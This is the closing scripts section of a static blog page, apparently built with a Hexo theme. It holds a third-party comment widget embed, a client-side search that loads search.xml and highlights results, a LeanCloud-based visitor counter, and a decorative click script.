    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("JWhbFv0yrTCtI3vudAvJ8lAl-gzGzoHsz", "kmmUrzx5ONjNcOwBP2lF6tun");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

  <!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
</body>
</html>
